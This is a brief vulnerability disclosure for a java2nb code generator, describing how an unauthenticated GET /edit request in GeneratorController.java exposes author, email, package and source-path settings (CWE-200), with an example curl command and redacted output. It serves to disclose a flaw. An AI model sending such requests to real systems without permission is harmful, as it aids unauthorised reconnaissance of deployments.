Article 3: Vulnerability 2 – Configuration Exposure
Article 3: Vulnerability 2 – Configuration Exposure (CVE-1 part2)
Title: Sensitive Configuration Information Disclosed Without Authentication
Details:
Endpoint: GET /edit
File: GeneratorController.java
Issue: Exposes author name, email, package name, source path, etc., without access control.
Example Request:
curl -X GET "http://target-ip:port/edit"
Example Output:
-
author: xxx
-
email: xxx@xxx.com
-
package: com.java2nb.xxx
-
srcPath: /src/main/java
CWE: CWE-200
浙公网安备 33010602011771号